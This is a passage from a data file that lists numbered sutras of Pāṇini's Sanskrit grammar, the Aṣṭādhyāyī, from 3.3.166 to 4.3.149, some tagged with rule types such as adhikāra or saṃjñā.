लोट्","3.3.166::अधीष्टे च","3.3.167::कालसमयवेलासु तुमुन्","3.3.168::लिङ् यदि","3.3.169::अर्हे कृत्यतृचश्च","3.3.170::आवश्यकाधमर्ण्ययोर्णिनिः","3.3.171::कृत्याश्च","3.3.172::शकि लिङ् च","3.3.173::आशिषि लिङ्लोटौ","3.3.174::क्तिच्क्तौ च संज्ञायाम्","3.3.175::माङि लुङ्","3.3.176::स्मोत्तरे लङ् च","3.4.1::धातुसम्बन्धे प्रत्ययाः","3.4.2::क्रियासमभिहारे लोट्; लोटो हिस्वौ; वा च तध्वमोः","3.4.3::समुच्चयेऽन्यतरस्याम्","3.4.4::यथाविध्यनुप्रयोगः पूर्वस्मिन्","3.4.5::समुच्चये सामान्यवचनस्य","3.4.6::छन्दसि लुङ्लङ्लिटः","3.4.7::लिङर्थे लेट्","3.4.8::उपसंवादाशङ्कयोश्च","3.4.9::तुमर्थे सेसेनसेअसेन्क्सेकसेनध्यैअध्यैन्कध्यैकध्यैन्शध्यैशध्यैन्तवैतवेङ्तवेनः","3.4.10::प्रयै रोहिष्यै अव्यथिष्यै","3.4.11::दृशे विख्ये च","3.4.12::शकि णमुल्कमुलौ","3.4.13::ईश्वरे तोसुन्कसुनौ","3.4.14::कृत्यार्थे तवैकेन्केन्यत्वनः","3.4.15::अवचक्षे च","3.4.16::भावलक्षणे स्थेण्कृञ्वदिचरिहुतमिजनिभ्यस्तोसुन्","3.4.17::सृपितृदोः कसुन्","3.4.18::अलङ्खल्वोः प्रतिषेधयोः प्राचां क्त्वा","3.4.19::उदीचां माङो व्यतीहारे","3.4.20::परावरयोगे च","3.4.21::समानकर्तृकयोः पूर्वकाले","3.4.22::आभीक्ष्ण्ये णमुल् च","3.4.23::न यद्यनाकाङ्क्षे","3.4.24::विभाषाऽग्रेप्रथमपूर्वेषु","3.4.25::कर्मण्याक्रोशे कृञः खमुञ्","3.4.26::स्वादुमि णमुल्","3.4.27::अन्यथैवंकथमित्थंसु सिद्धाप्रयोगश्चेत्","3.4.28::यथातथयोरसूयाप्रतिवचने","3.4.29::कर्मणि दृशिविदोः साकल्ये","3.4.30::यावति विन्दजीवोः","3.4.31::चर्मोदरयोः पूरेः","3.4.32::वर्षप्रमाण ऊलोपश्चास्यान्यतरस्याम्","3.4.33::चेले क्नोपेः","3.4.34::निमूलसमूलयोः कषः","3.4.35::शुष्कचूर्णरूक्षेषु पिषः","3.4.36::समूलाकृतजीवेषु हन्कृञ्ग्रहः","3.4.37::करणे हनः","3.4.38::स्नेहने पिषः","3.4.39::हस्ते वर्त्तिग्रहोः","3.4.40::स्वे पुषः","3.4.41::अधिकरणे बन्धः","3.4.42::संज्ञायाम्","3.4.43::कर्त्रोर्जीवपुरुषयोर्नशिवहोः","3.4.44::ऊर्ध्वे शुषिपूरोः","3.4.45::उपमाने कर्मणि च","3.4.46::कषादिषु यथाविध्यनुप्रयोगः","3.4.47::उपदंशस्तृतीयायाम्","3.4.48::हिंसार्थानां च समानकर्मकाणाम्","3.4.49::सप्तम्यां चोपपीडरुधकर्षः","3.4.50::समासत्तौ","3.4.51::प्रमाणे च","3.4.52::अपादाने परीप्सायाम्","3.4.53::द्वितीयायां च","3.4.54::स्वाङ्गेऽध्रुवे","3.4.55::परिक्लिश्यमाने च","3.4.56::विशिपतिपदिस्कन्दां व्याप्यमानासेव्यमानयोः","3.4.57::अस्यतितृषोः क्रियाऽन्तरे कालेषु","3.4.58::नाम्न्यादिशिग्रहोः","3.4.59::अव्ययेऽयथाभिप्रेताख्याने कृञः क्त्वाणमुलौ","3.4.60::तिर्यच्यपवर्गे","3.4.61::स्वाङ्गे तस्प्रत्यये कृभ्वोः","3.4.62::नाधाऽर्थप्रत्यये च्व्यर्थे","3.4.63::तूष्णीमि भुवः","3.4.64::अन्वच्यानुलोम्ये","3.4.65::'शकधृषज्ञाग्लाघटरभलभक्रमसहार्हास्त्यर्थेषु तुमुन्","3.4.66::पर्याप्तिवचनेष्वलमर्थेषु","3.4.67::कर्तरि कृत्","3.4.68::भव्यगेयप्रवचनीयोपस्थानीयजन्याप्लाव्यापात्या वा","3.4.69::लः कर्मणि च भावे चाकर्मकेभ्यः.","3.4.70::तयोरेव कृत्यक्तखलर्थाः","3.4.71::अदिकर्मणि क्तः कर्तरि च","3.4.72::गत्यर्थाकर्मकश्लिषशीङ्स्थाऽऽसवसजनरुहजीर्यतिभ्यश्च","3.4.73::दाशगोघ्नौ सम्प्रदाने","3.4.74::भीमादयोऽपादाने","3.4.75::ताभ्यामन्यत्रोणादयः","3.4.76::क्तोऽधिकरणे च ध्रौव्यगतिप्रत्यवसानार्थेभ्यः","3.4.77:अधिकारः:लस्य","3.4.78::तिप्तस्झिसिप्थस्थमिब्वस्मस् तातांझथासाथांध्वमिड्वहिमहिङ्","3.4.79::टित आत्मनेपदानां टेरे","3.4.80::थासस्से","3.4.81::लिटस्तझयोरेशिरेच्","3.4.82::परस्मैपदानां णलतुसुस्थलथुसणल्वमाः","3.4.83::विदो लटो वा","3.4.84::ब्रुवः पञ्चानामादित आहो ब्रुवः","3.4.85:अतिदेशः:लोटो लङ्वत्","3.4.86::एरुः","3.4.87:अतिदेशः:सेर्ह्यपिच्च","3.4.88::वा छन्दसि","3.4.89::मेर्निः","3.4.90::आमेतः","3.4.91::सवाभ्यां वामौ","3.4.92:अतिदेशः:आडुत्तमस्य पिच्च","3.4.93::एत ऐ","3.4.94::लेटोऽडाटौ","3.4.95::आत ऐ","3.4.96::वैतोऽन्यत्र","3.4.97::इतश्च लोपः परस्मैपदेषु","3.4.98::स उत्तमस्य","3.4.99::नित्यं ङितः","3.4.100::इतश्च","3.4.101::तस्थस्थमिपां तांतंतामः","3.4.102::लिङस्सीयुट्","3.4.103::यासुट् परस्मैपदेषूदात्तो ङिच्च","3.4.104::किदाशिषि","3.4.105::झस्य रन्","3.4.106::इटोऽत्","3.4.107::सुट् तिथोः","3.4.108::झेर्जुस्","3.4.109::सिजभ्यस्तविदिभ्यः च","3.4.110::आतः","3.4.111::लङः शाकटायनस्यैव","3.4.112::द्विषश्च","3.4.113:संज्ञा:तिङ्शित्सार्वधातुकम्","3.4.114:संज्ञा:आर्द्धधातुकं शेषः","3.4.115:संज्ञा:लिट् च","3.4.116:संज्ञा:लिङाशिषि","3.4.117:संज्ञा:छन्दस्युभयथा","4.1.1:अधिकारः:ङ्याप्प्रातिपदिकात्","4.1.2::स्वौजसमौट्छष्टाभ्याम्भिस्ङेभ्याम्भ्यस्ङसिभ्याम्भ्यस्ङसोसाम्ङ्योस्सुप्","4.1.3:अधिकारः:स्त्रियाम्","4.1.4::अजाद्यतष्टाप्","4.1.5::ऋन्नेभ्यो ङीप्","4.1.6::उगितश्च","4.1.7::वनो र च","4.1.8::पादोऽन्यतरस्याम्","4.1.9::टाबृचि","4.1.10::न षट्स्वस्रादिभ्यः","4.1.11::मनः","4.1.12::अनो बहुव्रीहेः","4.1.13::डाबुभाभ्यामन्यतरस्याम्","4.1.14:अधिकारः:अनुपसर्जनात्","4.1.15::टिड्ढाणञ्द्वयसज्दघ्नञ्मात्रच्तयप्ठक्ठञ्कञ्क्वरपः","4.1.16::यञश्च","4.1.17::प्राचां ष्फ तद्धितः","4.1.18::सर्वत्र लोहितादिकतान्तेभ्यः","4.1.19::कौरव्यमाण्डूकाभ्यां च","4.1.20::वयसि प्रथमे","4.1.21::द्विगोः","4.1.22::अपरिमाणबिस्ताचितकम्बल्येभ्यो न तद्धितलुकि","4.1.23::काण्डान्तात् क्षेत्रे","4.1.24::पुरुषात् प्रमाणेऽन्यतरस्याम्","4.1.25::बहुव्रीहेरूधसो ङीष्।","4.1.26::संख्याऽव्ययादेर्ङीप्","4.1.27::दामहायनान्ताच्च","4.1.28::अन उपधालोपिनोन्यतरस्याम्","4.1.29::नित्यं संज्ञाछन्दसोः","4.1.30::केवलमामकभागधेयपापापरसमानार्यकृत-सुमङ्गलभेषजाच्च","4.1.31::रात्रेश्चाजसौ","4.1.32::अन्तर्वत्पतिवतोर्नुक्","4.1.33::पत्युर्नो यज्ञसंयोगे","4.1.34::विभाषा सपूर्वस्य","4.1.35::नित्यं सपत्न्य्आदिषु","4.1.36::पूतक्रतोरै च","4.1.37::वृषाकप्यग्निकुसितकुसीदानामुदात्तः","4.1.38::मनोरौ वा","4.1.39::वर्णादनुदात्तात्तोपधात्तो नः","4.1.40::अन्यतो ङीष्।","4.1.41::षिद्गौरादिभ्यश्च","4.1.42::जानपदकुण्डगोणस्थलभाजनागकालनीलकुशकामुककबराद्वृत्त्यमत्रावपनाकृत्रिमाश्राणास्थौल्यवर्णानाच्छादनायोविकारमैथुनेच्छाकेशवेशेषु","4.1.43::शोणात् प्राचाम्","4.1.44::वोतो गुणवचनात्","4.1.45::बह्वादिभ्यश्च","4.1.46::नित्यं छन्दसि","4.1.47::भुवश्च","4.1.48::पुंयोगादाख्यायाम्","4.1.49::इन्द्रवरुणभवशर्वरुद्रमृडहिमारण्ययवयवनमातुलाचार्याणामानुक्","4.1.50::क्रीतात् करणपूर्वात्","4.1.51::क्तादल्पाख्यायाम्","4.1.52::बहुव्रीहेश्चान्तोदात्तात्","4.1.53::अस्वाङ्गपूर्वपदाद्वा","4.1.54::स्वाङ्गाच्चोपसर्जनादसंयोगोपधात्","4.1.55::नासिकोदरौष्ठजङ्घादन्तकर्णशृङ्गाच्च","4.1.56::न क्रोडादिबह्वचः","4.1.57::सहनञ्विद्यमानपूर्वाच्च","4.1.58::नखमुखात् संज्ञायाम्","4.1.59::दीर्घजिह्वी च च्छन्दसि","4.1.60::दिक्पूर्वपदान्ङीप्","4.1.61::वाहः","4.1.62::सख्यशिश्वीति भाषायाम्","4.1.63::जातेरस्त्रीविषयादयोपधात्","4.1.64::पाककर्णपर्णपुष्पफलमूलबालोत्तरपदाच्च","4.1.65::इतो मनुष्यजातेः","4.1.66::ऊङुतः","4.1.67::बाह्वन्तात् संज्ञायाम्","4.1.68::पङ्गोश्च","4.1.69::ऊरूत्तरपदादौपम्ये","4.1.70::संहितशफलक्षणवामादेश्च","4.1.71::कद्रुकमण्डल्वोश्छन्दसि","4.1.72::संज्ञायाम्","4.1.73::शार्ङ्गरवाद्यञो ङीन्","4.1.74::यङश्चाप्","4.1.75::आवट्याच्च","4.1.76:संज्ञा; अधिकारः:तद्धिताः","4.1.77::यूनस्तिः","4.1.78::अणिञोरनार्षयोर्गुरूपोत्तमयोः ष्यङ् गोत्रे","4.1.79::गोत्रावयवात्","4.1.80::क्रौड्यादिभ्यश्च","4.1.81::दैवयज्ञिशौचिवृक्षिसात्यमुग्रिकाण्ठेविद्धिभ्योऽन्यतरस्याम्","4.1.82:अधिकारः:समर्थानां प्रथमाद्वा","4.1.83:अधिकारः:प्राग्दीव्यतोऽण्","4.1.84::अश्वपत्यादिभ्यश्च","4.1.85::दित्यदित्यादित्यपत्युत्तरपदाण्ण्यः","4.1.86::उत्सादिभ्योऽञ्","4.1.87::स्त्रीपुंसाभ्यां नञ्स्नञौ भवनात्","4.1.88::द्विगोर्लुगनपत्ये","4.1.89::गोत्रेऽलुगचि","4.1.90::यूनि लुक्","4.1.91::फक्फिञोरन्यतरस्याम्","4.1.92:अधिकारः:तस्यापत्यम्","4.1.93::एको गोत्रे","4.1.94::गोत्राद्यून्यस्त्रियाम्","4.1.95::अत इञ्","4.1.96::बाह्वादिभ्यश्च","4.1.97::सुधातुरकङ् च","4.1.98::गोत्रे कुञ्जादिभ्यश्च्फञ्","4.1.99::नडादिभ्यः फक्","4.1.100::हरितादिभ्योऽञः","4.1.101::यञिञोश्च","4.1.102::शरद्वच्छुनकदर्भाद्भृगुवत्साग्रायणेषु","4.1.103::द्रोणपर्वतजीवन्तादन्यतरयाम्","4.1.104::अनृष्यानन्तर्ये बिदादिभ्योऽञ्","4.1.105::गर्गादिभ्यो यञ्","4.1.106::मधुबभ्र्वोर्ब्राह्मणकौशिकयोः","4.1.107::कपिबोधादाङ्गिरसे","4.1.108::वतण्डाच्च","4.1.109::लुक् स्त्रियाम्","4.1.110::अश्वादिभ्यः फञ्","4.1.111::भर्गात् त्रैगर्ते","4.1.112::शिवादिभ्योऽण्","4.1.113::अवृद्धाभ्यो नदीमानुषीभ्यस्तन्नामिकाभ्यः","4.1.114::ऋष्यन्धकवृष्णिकुरुभ्यश्च","4.1.115::मातुरुत् संख्यासम्भद्रपूर्वायाः","4.1.116::कन्यायाः कनीन च","4.1.117::विकर्णशुङ्गच्छगलाद्वत्सभरद्वाजात्रिषु","4.1.118::पीलाया वा","4.1.119::ढक् च मण्डूकात्","4.1.120::स्त्रीभ्यो ढक्","4.1.121::द्व्यचः","4.1.122::इतश्चानिञः","4.1.123::शुभ्रादिभ्यश्च","4.1.124::विकर्णकुषीतकात् काश्यपे","4.1.125::भ्रुवो वुक् च","4.1.126::कल्याण्यादीनामिनङ्","4.1.127::कुलटाया वा","4.1.128::चटकाया ऐरक्","4.1.129::गोधाया ढ्रक्","4.1.130::आरगुदीचाम्","4.1.131::क्षुद्राभ्यो वा","4.1.132::पितृष्वसुश्छण्","4.1.133::ढकि लोपः","4.1.134::मातृष्वसुश्च","4.1.135::चतुष्पाद्भ्यो ढञ्","4.1.136::गृष्ट्यादिभ्यश्च","4.1.137::राजश्वशुराद्यत्","4.1.138::क्षत्राद्घः","4.1.139::कुलात् खः","4.1.140::अपूर्वपदादन्यतरस्यां यड्ढकञौ","4.1.141::महाकुलादञ्खञौ","4.1.142::दुष्कुलाड्ढक्","4.1.143::स्वसुश्छः","4.1.144::भ्रातुर्व्यच्च","4.1.145::व्यन् सपत्ने","4.1.146::रेवत्यादिभ्यष्ठक्","4.1.147::गोत्रस्त्रियाः कुत्सने ण च","4.1.148::वृद्धाट्ठक् सौवीरेषु बहुलम्","4.1.149::फेश्छ च","4.1.150::फाण्टाहृतिमिमताभ्यां णफिञौ","4.1.151::कुर्वादिभ्यो ण्यः","4.1.152::सेनान्तलक्षणकारिभ्यश्च","4.1.153::उदीचामिञ्","4.1.154::तिकादिभ्यः फिञ्","4.1.155::कौसल्यकार्मार्याभ्यां च","4.1.156::अणो द्व्यचः","4.1.157::उदीचां वृद्धादगोत्रात्","4.1.158::वाकिनादीनां कुक् च","4.1.159::पुत्रान्तादन्यतरस्याम्","4.1.160::प्राचामवृद्धात् फिन् बहुलम्","4.1.161::मनोर्जातावञ्यतौ षुक् च","4.1.162:संज्ञा:अपत्यं पौत्रप्रभृति गोत्रम्","4.1.163:संज्ञा:जीवति तु वंश्ये युवा","4.1.164:संज्ञा:भ्रातरि च ज्यायसि","4.1.165:संज्ञा:वाऽन्यस्मिन् सपिण्डे स्थविरतरे जीवति","4.1.166::वृद्धस्य च पूजायाम्","4.1.167::यूनश्च कुत्सायाम्","4.1.168::जनपदशब्दात् क्षत्रियादञ्","4.1.169::साल्वेयगान्धारिभ्यां च","4.1.170::द्व्यञ्मगधकलिङ्गसूरमसादण्","4.1.171::वृद्धेत्कोसलाजादाञ्ञ्यङ्","4.1.172::कुरुणादिभ्यो ण्यः","4.1.173::साल्वावयवप्रत्यग्रथकलकूटाश्मकादिञ्","4.1.174:संज्ञा:ते तद्राजाः","4.1.175::कम्बोजाल्लुक्","4.1.176::स्त्रियामवन्तिकुन्तिकुरुभ्यश्च","4.1.177::अतश्च","4.1.178::न प्राच्यभर्गादियौधेयादिभ्यः","4.2.1::तेन रक्तं रागात्","4.2.2::लाक्षारोचना{शकलकर्दमा}ट्ठक्","4.2.3::नक्षत्रेण युक्तः कालः","4.2.4::लुबविशेषे","4.2.5::संज्ञायां श्रवणाश्वत्थाभ्याम्","4.2.6::द्वंद्वाच्छः","4.2.7::दृष्ट्अं साम","4.2.8::कलेर्ढक्","4.2.9::वामदेवाड्ड्यड्ड्यौ","4.2.10::परिवृतो रथः","4.2.11::पाण्डुकम्बलादिनिः","4.2.12::द्वैपवैयाघ्रादञ्","4.2.13::कौमारापूर्ववचने","4.2.14::तत्रोद्धृतममत्रेभ्यः","4.2.15::स्थण्डिलाच्छयितरि व्रते","4.2.16::संस्कृतं भक्षाः","4.2.17::शूलोखाद्यत्","4.2.18::दध्नष्ठक्","4.2.19::उदश्वितोऽन्यतरस्याम्","4.2.20::क्षीराड्ढञ्","4.2.21::साऽस्मिन् पौर्णमासीति {संज्ञायाम्}","4.2.22::आग्रहायण्यश्वत्थाट्ठक्","4.2.23::विभाषा फाल्गुनीश्रवणाकार्त्तिकीचैत्रीभ्यः","4.2.24::साऽस्य देवता","4.2.25::कस्येत्","4.2.26::शुक्राद्घन्","4.2.27::अपोनप्त्रपान्नप्तृभ्यां घः","4.2.28::छ च","4.2.29::महेन्द्राद्घाणौ च","4.2.30::सोमाट्ट्यण्","4.2.31::वाय्वृतुपित्रुषसो यत्","4.2.32::द्यावापृथिवीशुनासीरमरुत्वदग्नीषोमवास्तोष्पतिगृहमेधाच्छ च","4.2.33::अग्नेर्ढक्","4.2.34:अतिदेशः:कालेभ्यो भववत्","4.2.35::महाराजप्रोष्ठपदाट्ठञ्","4.2.36::पितृव्यमातुलमातामहपितामहाः","4.2.37::तस्य समूहः","4.2.38::भिक्षाऽऽदिभ्योऽण्","4.2.39::गोत्रोक्षोष्ट्रोरभ्रराजराजन्यराजपुत्रवत्समनुष्याजाद्वुञ्","4.2.40::केदाराद्यञ् च","4.2.41::ठञ् कवचिनश्च","4.2.42::ब्राह्मणमाणववाडवाद्यन्","4.2.43::ग्रामजनबन्धुसहायेभ्यः तल्","4.2.44::अनुदात्तादेरञ्","4.2.45::खण्डिकादिभ्यश्च","4.2.46:अतिदेशः:चरणेभ्यो धर्मवत्","4.2.47::अचित्तहस्तिधेनोष्ठक्","4.2.48::केशाश्वाभ्यां यञ्छावन्यतरस्याम्","4.2.49::पाशादिभ्यो यः","4.2.50::खलगोरथात्","4.2.51::इनित्रकट्यचश्च","4.2.52::विषयो देशे","4.2.53::राजन्यादिभ्यो वुञ्","4.2.54::भौरिक्याद्यैषुकार्यादिभ्यो विधल्भक्तलौ","4.2.55::सोऽस्यादिरिति च्छन्दसः प्रगाथेषु","4.2.56::संग्रामे प्रयोजनयोद्धृभ्यः","4.2.57::तदस्यां प्रहरणमिति क्रीडायाम् णः","4.2.58::घञः साऽस्यां क्रियेति ञः","4.2.59::तदधीते तद्वेद","4.2.60::क्रतूक्थादिसूत्रान्ताट्ठक्","4.2.61::क्रमादिभ्यो वुन्","4.2.62::अनुब्राह्मणादिनिः","4.2.63::वसन्तादिभ्यष्ठक्","4.2.64::प्रोक्ताल्लुक्","4.2.65::सूत्राच्च कोपधात्","4.2.66::छन्दोब्राह्मणानि च तद्विषयाणि","4.2.67::तदस्मिन्नस्तीति देशे तन्नाम्नि","4.2.68::तेन निर्वृत्तम्","4.2.69::तस्य निवासः","4.2.70::अदूरभवश्च","4.2.71::ओरञ्","4.2.72::मतोश्च बह्वजङ्गात्","4.2.73::बह्वचः कूपेषु","4.2.74::उदक् च विपाशः","4.2.75::संकलादिभ्यश्च","4.2.76::स्त्रीषु सौवीरसाल्वप्राक्षु","4.2.77::सुवास्त्वादिभ्योऽण्","4.2.78::रोणी","4.2.79::कोपधाच्च","4.2.80::वुञ्छण्कठजिलशेनिरढञ्ण्ययफक्फिञिञ्ञ्यकक्ठकोऽरीहणकृशाश्वर्श्यकुमुदकाशतृणप्रेक्षाऽश्मसखिसंकाशबलपक्षकर्णसुतंगमप्रगदिन्वराहकुमुदादिभ्यः","4.2.81::जनपदे लुप्","4.2.82::वरणादिभ्यश्च","4.2.83::शर्कराया वा","4.2.84::ठक्छौ च","4.2.85::नद्यां मतुप्","4.2.86::मध्वादिभ्यश्च","4.2.87::कुमुदनडवेतसेभ्यो ड्मतुप्","4.2.88::नडशादाड्ड्वलच्","4.2.89::शिखाया वलच्","4.2.90::उत्करादिभ्यश्छः","4.2.91::नडादीनां कुक् च","4.2.92::शेषे","4.2.93::राष्ट्रावारपाराद्घखौ","4.2.94::ग्रामाद्यखञौ","4.2.95::कत्त्र्यादिभ्यो ढकञ्","4.2.96::कुलकुक्षिग्रीवाभ्यः श्वास्यलंकारेषु","4.2.97::नद्यादिभ्यो ढक्","4.2.98::दक्षिणापश्चात्पुरसस्त्यक्","4.2.99::कापिश्याः ष्फक्","4.2.100::रंकोरमनुष्येऽण् च","4.2.101::द्युप्रागपागुदक्प्रतीचो यत्","4.2.102::कन्थायाष्ठक्","4.2.103::वर्णौ वुक्","4.2.104::अव्ययात्त्यप्","4.2.105::ऐषमोह्यःश्वसोऽन्यतरस्याम्","4.2.106::तीररूप्योत्तरपदादञ्ञौ","4.2.107::दिक्पूर्वपदादसंज्ञायां ञः","4.2.108::मद्रेभ्योऽञ्","4.2.109::उदीच्यग्रामाच्च बह्वचोऽन्तोदात्तात्","4.2.110::प्रस्थोत्तरपदपलद्यादिकोपधादण्","4.2.111::कण्वादिभ्यो गोत्रे","4.2.112::इञश्च","4.2.113::न द्व्यचः प्राच्यभरतेषु","4.2.114::वृद्धाच्छः","4.2.115::भवतष्ठक्छसौ","4.2.116::काश्यादिभ्यष्ठञ्ञिठौ","4.2.117::वाहीकग्रामेभ्यश्च","4.2.118::विभाषोशीनरेषु","4.2.119::ओर्देशे ठञ्","4.2.120::वृद्धात् प्राचाम्","4.2.121::धन्वयोपधाद्वुञ्","4.2.122::प्रस्थपुरवहान्ताच्च","4.2.123::रोपधेतोः प्राचाम्","4.2.124::जनपदतदवध्योश्च","4.2.125::अवृद्धादपि बहुवचनविषयात्","4.2.126::क्अच्छाग्निवक्त्रगर्त्तोत्तरपदात्","4.2.127::धूमादिभ्यश्च","4.2.128::नगरात् कुत्सनप्रावीण्ययोः","4.2.129::अरण्यान्मनुष्ये","4.2.130::विभाषा कुरुयुगन्धराभ्याम्","4.2.131::मद्रवृज्योः कन्","4.2.132::कोपधादण्","4.2.133::कच्छादिभ्यश्च","4.2.134::मनुष्यतत्स्थयोर्वुञ्","4.2.135::अपदातौ साल्वात्","4.2.136::गोयवाग्वोश्च","4.2.137::गर्तोत्तरपदाच्छः","4.2.138::गहादिभ्यश्च","4.2.139::प्राचां कटादेः","4.2.140::राज्ञः क च","4.2.141::वृद्धादकेकान्तखोपधात्","4.2.142::कन्थापलदनगरग्रामह्रदोत्तरपदात्","4.2.143::पर्वताच्च","4.2.144::विभाषाऽमनुष्ये","4.2.145::कृकणपर्णाद्भारद्वाजे","4.3.1::युष्मदस्मदोरन्यतरस्यां खञ् च","4.3.2::तस्मिन् नणि च युष्माकास्माकौ","4.3.3::तवकममकावेकवचने","4.3.4::अर्धाद्यत्","4.3.5::परावराधमोत्तमपूर्वाच्च","4.3.6::दिक्पूर्वपदाट्ठञ् च","4.3.7::ग्रामजनपदैकदेशादञ्ठञौ","4.3.8::मध्यान्मः","4.3.9::अ साम्प्रतिके","4.3.10::द्वीपादनुसमुद्रं यञ्","4.3.11::कालाट्ठञ्","4.3.12::श्राद्धे शरदः","4.3.13::विभाषा रोगातपयोः","4.3.14::निशाप्रदोषाभ्यां च","4.3.15::श्वसस्तुट् च","4.3.16::संधिवेलाऽऽद्यृतुनक्षत्रेभ्योऽण्","4.3.17::प्रावृष एण्यः","4.3.18::वर्षाभ्यष्ठक्","4.3.19::छन्दसि ठञ्","4.3.20::वसन्ताच्च","4.3.21::हेमन्ताच्च","4.3.22::सर्वत्राण् च तलोपश्च","4.3.23::सायंचिरम्प्राह्णेप्रगेऽव्ययेभ्यष्ट्युट्युलौ तुट् च","4.3.24::विभाषा पूर्वाह्णापराह्णाभ्याम्","4.3.25::तत्र जातः","4.3.26::प्रावृषष्ठप्","4.3.27::संज्ञायां शरदो वुञ्","4.3.28::पूर्वाह्णापराह्णार्द्रामूलप्रदोषावस्कराद्वुन्","4.3.29::पथः पन्थ च","4.3.30::अमावास्याया वा","4.3.31::अ च","4.3.32::सिन्ध्वपकराभ्यां कन्","4.3.33::अणञौ च","4.3.34::श्रविष्ठाफल्गुन्यनुराधास्वातितिष्यपुनर्वसुहस्तविशाखाऽषाढाबहुलाल्लुक्","4.3.35::स्थानान्तगोशालखरशालाच्च","4.3.36::वत्सशालाऽभिजिदश्वयुक्छतभिषजो वा","4.3.37::नक्षत्रेभ्यो बहुलम्","4.3.38::कृतलब्धक्रीतकुशलाः","4.3.39::प्रायभवः","4.3.40::उपजानूपकर्णोपनीवेष्ठक्","4.3.41::संभूते","4.3.42::कोशाड्ढञ्","4.3.43::कालात् साधुपुष्प्यत्पच्यमानेषु","4.3.44::उप्ते च","4.3.45::आश्वयुज्या वुञ्","4.3.46::ग्रीष्मवसन्तादन्यतरस्याम्","4.3.47::देयमृणे","4.3.48::कलाप्यश्वत्थयवबुसाद्वुन्","4.3.49::ग्रीष्मावरसमाद्वुञ्","4.3.50::संवत्सराग्रहायणीभ्यां ठञ् च","4.3.51::व्याहरति मृगः","4.3.52::तदस्य सोढम्","4.3.53::तत्र भवः","4.3.54::दिगादिभ्यो यत्","4.3.55::शरीरावयवाच्च","4.3.56::दृतिकुक्षिकलशिवस्त्यस्त्यहेर्ढञ्","4.3.57::ग्रीवाभ्योऽण् च","4.3.58::गम्भीराञ्ञ्यः","4.3.59::अव्ययीभावाच्च","4.3.60::अन्तःपूर्वपदाट्ठञ्","4.3.61::ग्रामात् पर्यनुपूर्वात्","4.3.62::जिह्वामूलाङ्गुलेश्छः","4.3.63::वर्गान्ताच्च","4.3.64::अशब्दे यत्खावन्यतरस्याम्","4.3.65::कर्णललाटात् कनलंकारे","4.3.66::तस्य व्याख्यान इति च व्याख्यातव्यनाम्नः","4.3.67::बह्वचोऽन्तोदात्ताट्ठञ्","4.3.68::क्रतुयज्ञेभ्यश्च","4.3.69::अध्यायेष्वेवर्षेः","4.3.70::पौरोडाशपुरोडाशात् ष्ठन्","4.3.71::छन्दसो यदणौ","4.3.72::द्व्यजृद्ब्राह्मणर्क्प्रथमाध्वरपुरश्चरणनामाख्याताट्ठक्","4.3.73::अणृगयनादिभ्यः","4.3.74::तत आगतः","4.3.75::ठगायस्थानेभ्यः","4.3.76::शुण्डिकादिभ्योऽण्","4.3.77::विद्यायोनिसंबन्धेभ्यो वुञ्","4.3.78::ऋतष्ठञ्","4.3.79::पितुर्यच्च","4.3.80::गोत्रादङ्कवत्","4.3.81::हेतुमनुष्येभ्योऽन्यतरस्यां रूप्यः","4.3.82::मयट् च","4.3.83::प्रभवति","4.3.84::विदूराञ्ञ्यः","4.3.85::तद्गच्छति पथिदूतयोः","4.3.86::अभिनिष्क्रामति द्वारम्","4.3.87::अधिकृत्य कृते ग्रन्थे","4.3.88::शिशुक्रन्दयमसभद्वंद्वेन्द्रजननादिभ्यश्छः","4.3.89::सोऽस्य निवासः","4.3.90::अभिजनश्च","4.3.91::आयुधजीविभ्यश्छः पर्वते","4.3.92::शण्डिकादिभ्यो ञ्यः","4.3.93::सिन्धुतक्षशिलाऽऽदिभ्योऽणञौ","4.3.94::तूदीशलातुरवर्मतीकूचवाराड्ढक्छण्ढञ्यकः","4.3.95::भक्तिः","4.3.96::अचित्ताददेशकालाट्ठक्","4.3.97::महाराजाट्ठञ्","4.3.98::वासुदेवार्जुनाभ्यां वुन्","4.3.99::गोत्रक्षत्रियाख्येभ्यो बहुलं वुञ्","4.3.100::जनपदिनां जनपदवत् सर्वं जनपदेन समानशब्दानां बहुवचने","4.3.101::तेन प्रोक्तम्","4.3.102::तित्तिरिवरतन्तुखण्डिकोखाच्छण्","4.3.103::काश्यपकौशिकाभ्यामृषिभ्यां णिनिः","4.3.104::कलापिवैशम्पायनान्तेवासिभ्यश्च","4.3.105::पुराणप्रोक्तेषु ब्राह्मणकल्पेषु","4.3.106::शौनकादिभ्यश्छन्दसि","4.3.107::कठचरकाल्लुक्","4.3.108::कलापिनोऽण्","4.3.109::छगलिनो ढिनुक्","4.3.110::पाराशर्यशिलालिभ्यां भिक्षुनटसूत्रयोः","4.3.111::कर्मन्दकृशाश्वादिनिः","4.3.112::तेनैकदिक्","4.3.113::तसिश्च","4.3.114::उरसो यच्च","4.3.115::उपज्ञाते","4.3.116::कृते ग्रन्थे","4.3.117::संज्ञायाम्","4.3.118::कुलालादिभ्यो वुञ्","4.3.119::क्षुद्राभ्रमरवटरपादपादञ्","4.3.120::तस्येदम्","4.3.121::रथाद्यत्","4.3.122::पत्त्रपूर्वादञ्","4.3.123::पत्त्राध्वर्युपरिषदश्च","4.3.124::हलसीराट्ठक्","4.3.125::द्वंद्वाद्वुन् वैरमैथुनिकयोः","4.3.126::गोत्रचरणाद्वुञ्","4.3.127::संघाङ्कलक्षणेष्वञ्यञिञामण्","4.3.128::शाकलाद्वा","4.3.129::छन्दोगौक्थिकयाज्ञिकबह्वृचनटाञ्ञ्यः","4.3.130::न दण्डमाणवान्तेवासिषु","4.3.131::रैवतिकादिभ्यश्छः","4.3.132::कौपिञ्जलहास्तिपदादण्","4.3.133::आथर्वणिकस्येकलोपश्च","4.3.134::तस्य विकारः","4.3.135::अवयवे च प्राण्योषधिवृक्षेभ्यः","4.3.136::बिल्वादिभ्योऽण्","4.3.137::कोपधाच्च","4.3.138::त्रपुजतुनोः षुक्","4.3.139::ओरञ्","4.3.140::अनुदात्तादेश्च","4.3.141::पलाशादिभ्यो वा","4.3.142::शम्याष्ट्लञ्","4.3.143::मयड्वैतयोर्भाषायामभक्ष्याच्छादनयोः","4.3.144::नित्यं वृद्धशरादिभ्यः","4.3.145::गोश्च पुरीषे","4.3.146::पिष्टाच्च","4.3.147::संज्ञायां कन्","4.3.148::व्रीहेः पुरोडाशे","4.3.149::असंज्ञायां 